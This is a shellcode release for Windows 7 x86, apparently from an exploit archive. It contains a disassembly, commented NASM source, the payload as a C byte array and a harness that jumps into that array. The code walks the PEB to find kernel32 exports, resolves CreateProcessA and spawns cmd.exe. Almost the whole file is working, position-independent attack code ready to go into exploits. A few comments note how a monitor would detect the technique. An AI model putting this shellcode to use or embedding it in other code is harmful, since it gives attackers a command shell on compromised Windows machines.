/* # Title : Windows x86 CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) shellcode # Author : Roziul Hasan Khan Shifat # Date : 15-08-2016 # Tested On : Windows 7 x86 */ /* Disassembly of section .text: 00000000 <_start>: 0: 31 c9 xor %ecx,%ecx 2: 64 8b 41 30 mov %fs:0x30(%ecx),%eax 6: 8b 40 0c mov 0xc(%eax),%eax 9: 8b 70 14 mov 0x14(%eax),%esi c: ad lods %ds:(%esi),%eax d: 96 xchg %eax,%esi e: ad lods %ds:(%esi),%eax f: 8b 48 10 mov 0x10(%eax),%ecx 12: 31 db xor %ebx,%ebx 14: 8b 59 3c mov 0x3c(%ecx),%ebx 17: 01 cb add %ecx,%ebx 19: 8b 5b 78 mov 0x78(%ebx),%ebx 1c: 01 cb add %ecx,%ebx 1e: 8b 73 20 mov 0x20(%ebx),%esi 21: 01 ce add %ecx,%esi 23: 31 d2 xor %edx,%edx 00000025 : 25: 42 inc %edx 26: ad lods %ds:(%esi),%eax 27: 01 c8 add %ecx,%eax 29: 81 38 47 65 74 50 cmpl $0x50746547,(%eax) 2f: 75 f4 jne 25 31: 81 78 04 72 6f 63 41 cmpl $0x41636f72,0x4(%eax) 38: 75 eb jne 25 3a: 81 78 08 64 64 72 65 cmpl $0x65726464,0x8(%eax) 41: 75 e2 jne 25 43: 8b 73 1c mov 0x1c(%ebx),%esi 46: 01 ce add %ecx,%esi 48: 8b 14 96 mov (%esi,%edx,4),%edx 4b: 01 ca add %ecx,%edx 4d: 89 d6 mov %edx,%esi 4f: 89 cf mov %ecx,%edi 51: 31 db xor %ebx,%ebx 53: 68 79 41 41 41 push $0x41414179 58: 66 89 5c 24 01 mov %bx,0x1(%esp) 5d: 68 65 6d 6f 72 push $0x726f6d65 62: 68 65 72 6f 4d push $0x4d6f7265 67: 68 52 74 6c 5a push $0x5a6c7452 6c: 54 push %esp 6d: 51 push %ecx 6e: ff d2 call *%edx 70: 83 c4 10 add $0x10,%esp 73: 31 c9 xor %ecx,%ecx 75: 89 ca mov %ecx,%edx 77: b2 54 mov $0x54,%dl 79: 51 push %ecx 7a: 83 ec 54 sub $0x54,%esp 7d: 8d 0c 24 lea (%esp),%ecx 80: 51 push %ecx 81: 52 push %edx 82: 51 push %ecx 83: ff d0 call *%eax 85: 59 pop %ecx 86: 31 d2 xor %edx,%edx 88: 68 73 41 42 42 push $0x42424173 8d: 66 89 54 24 02 mov %dx,0x2(%esp) 92: 68 6f 63 65 73 push $0x7365636f 97: 68 74 65 50 72 push $0x72506574 9c: 68 43 72 65 61 push $0x61657243 a1: 8d 14 24 lea (%esp),%edx a4: 51 push %ecx a5: 52 push %edx a6: 57 push %edi a7: ff d6 call *%esi a9: 59 
pop %ecx aa: 83 c4 10 add $0x10,%esp ad: 31 db xor %ebx,%ebx af: 68 65 78 65 41 push $0x41657865 b4: 88 5c 24 03 mov %bl,0x3(%esp) b8: 68 63 6d 64 2e push $0x2e646d63 bd: 8d 1c 24 lea (%esp),%ebx c0: 31 d2 xor %edx,%edx c2: b2 44 mov $0x44,%dl c4: 89 11 mov %edx,(%ecx) c6: 8d 51 44 lea 0x44(%ecx),%edx c9: 56 push %esi ca: 31 f6 xor %esi,%esi cc: 52 push %edx cd: 51 push %ecx ce: 56 push %esi cf: 56 push %esi d0: 56 push %esi d1: 56 push %esi d2: 56 push %esi d3: 56 push %esi d4: 53 push %ebx d5: 56 push %esi d6: ff d0 call *%eax d8: 5e pop %esi d9: 83 c4 08 add $0x8,%esp dc: 31 db xor %ebx,%ebx de: 68 65 73 73 41 push $0x41737365 e3: 88 5c 24 03 mov %bl,0x3(%esp) e7: 68 50 72 6f 63 push $0x636f7250 ec: 68 45 78 69 74 push $0x74697845 f1: 8d 1c 24 lea (%esp),%ebx f4: 53 push %ebx f5: 57 push %edi f6: ff d6 call *%esi f8: 31 c9 xor %ecx,%ecx fa: 51 push %ecx fb: ff d0 call *%eax */ /* section .text global _start _start: xor ecx,ecx mov eax,[fs:ecx+0x30] ;PEB mov eax,[eax+0xc] ;PEB->ldr mov esi,[eax+0x14] ;PEB->ldr.InMemOrderModuleList lodsd xchg esi,eax lodsd mov ecx,[eax+0x10] ;kernel32 base address xor ebx,ebx mov ebx,[ecx+0x3c] ;DOS->elf_anew add ebx,ecx ;PE HEADER mov ebx,[ebx+0x78] ;DataDirectory->VirtualAddress add ebx,ecx ;IMAGE_EXPORT_DIRECTORY mov esi,[ebx+0x20] ;AddressOfNames add esi,ecx ;--------------------------------------------- xor edx,edx func: inc edx lodsd add eax,ecx cmp dword [eax],'GetP' jnz func cmp dword [eax+4],'rocA' jnz func cmp dword [eax+8],'ddre' jnz func ;-------------------------------- mov esi,[ebx+0x1c] ;AddressOfFunctions add esi,ecx mov edx,[esi+edx*4] add edx,ecx ;GetProcAddress() ;------------------------------------- mov esi,edx mov edi,ecx ;------------------------- xor ebx,ebx ;finding address of RtlZeroMemory() push 0x41414179 mov [esp+1],word bx push 0x726f6d65 push 0x4d6f7265 push 0x5a6c7452 push esp push ecx call edx ;------------------------------ add esp,16 ;----------------------------------- ;zero out 84 bytes xor 
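ecx,ecx mov edx,ecx mov dl,84 push ecx sub esp,84 lea ecx,[esp] push ecx push edx push ecx call eax ;---------------------------- ;finding address of CreateProcessA() pop ecx xor edx,edx push 0x42424173 mov [esp+2],word dx push 0x7365636f push 0x72506574 push 0x61657243 lea edx,[esp] push ecx push edx push edi call esi ;-------------------------------- ;CreateProcessA(NULL,"cmd.exe",NULL,NULL,0,NULL,NULL,NULL,&STARTUPINFO,&PROCESS_INFORMATION) pop ecx add esp,16 xor ebx,ebx push 0x41657865 mov [esp+3],byte bl push 0x2e646d63 lea ebx,[esp] xor edx,edx mov dl,68 mov [ecx],edx lea edx,[ecx+68] push esi ; xor esi,esi push edx push ecx push esi push esi push esi push esi push esi push esi push ebx push esi call eax pop esi ;------------------------------------- ;finding address of ExitProcess() add esp,8 xor ebx,ebx push 0x41737365 mov [esp+3],byte bl push 0x636f7250 push 0x74697845 lea ebx,[esp] push ebx push edi call esi xor ecx,ecx push ecx call eax */

/* Header names were lost in the original listing ("#include #include");
 * printf() needs <stdio.h> and strlen() needs <string.h>. */
#include <stdio.h>
#include <string.h>

/*
 * The machine code from the listing above, as one byte string.
 *
 * The string literal appends a NUL that is not part of the payload.  The
 * listing contains no 0x00 byte, so strlen() would report the full size,
 * but main() below uses sizeof instead so the reported length does not
 * depend on that property.
 */
char shellcode[] =
"\x31\xc9\x64\x8b\x41\x30\x8b\x40\x0c\x8b\x70\x14\xad\x96\xad\x8b\x48\x10\x31\xdb\x8b\x59\x3c\x01\xcb\x8b\x5b\x78\x01\xcb\x8b\x73\x20\x01\xce\x31\xd2\x42\xad\x01\xc8\x81\x38\x47\x65\x74\x50\x75\xf4\x81\x78\x04\x72\x6f\x63\x41\x75\xeb\x81\x78\x08\x64\x64\x72\x65\x75\xe2\x8b\x73\x1c\x01\xce\x8b\x14\x96\x01\xca\x89\xd6\x89\xcf\x31\xdb\x68\x79\x41\x41\x41\x66\x89\x5c\x24\x01\x68\x65\x6d\x6f\x72\x68\x65\x72\x6f\x4d\x68\x52\x74\x6c\x5a\x54\x51\xff\xd2\x83\xc4\x10\x31\xc9\x89\xca\xb2\x54\x51\x83\xec\x54\x8d\x0c\x24\x51\x52\x51\xff\xd0\x59\x31\xd2\x68\x73\x41\x42\x42\x66\x89\x54\x24\x02\x68\x6f\x63\x65\x73\x68\x74\x65\x50\x72\x68\x43\x72\x65\x61\x8d\x14\x24\x51\x52\x57\xff\xd6\x59\x83\xc4\x10\x31\xdb\x68\x65\x78\x65\x41\x88\x5c\x24\x03\x68\x63\x6d\x64\x2e\x8d\x1c\x24\x31\xd2\xb2\x44\x89\x11\x8d\x51\x44\x56\x31\xf6\x52\x51\x56\x56\x56\x56\x56\x56\x53\x56\xff\xd0\x5e\x83\xc4\x08\x31\xdb\x68\x65\x73\x73\x41\x88\x5c\x24\x03\x68\x50\x72\x6f\x63\x68\x45\x78\x69\x74\x8d\x1c\x24\x53\x57\xff\xd6\x31\xc9\x51\xff\xd0";

/*
 * Test harness: prints the payload size, then transfers control into the
 * byte array in-process.
 *
 * Per the listing above, the payload walks the PEB loader list
 * (fs:[0x30] -> Ldr -> InMemoryOrderModuleList) to find the kernel32 base,
 * scans its export names for GetProcAddress, resolves RtlZeroMemory,
 * CreateProcessA and ExitProcess through it, and finishes with
 * ExitProcess(0).  The call below therefore does not return on success;
 * the trailing return is only reached if control comes back at all.
 *
 * NOTE(review): `shellcode` is an ordinary writable global.  Whether the
 * platform permits executing it depends on the build's and OS's
 * executable-memory policy, which the listing does not establish (the
 * header only records "Tested On : Windows 7 x86").  From a detection
 * standpoint, this sequence — PEB walk, export-table lookup and a call
 * into a data buffer — is the behaviour a monitor would flag.
 *
 * Returns 0 if control ever returns from the payload.
 */
int main(void)
{
    /* Size of the byte array minus the literal's terminating NUL. */
    long length = (long)(sizeof shellcode - 1);

    printf("shellcode lenght %ld\n", length);

    /* Treat the array as an argument-less function and call it. */
    ((int (*)(void))shellcode)();

    return 0;
}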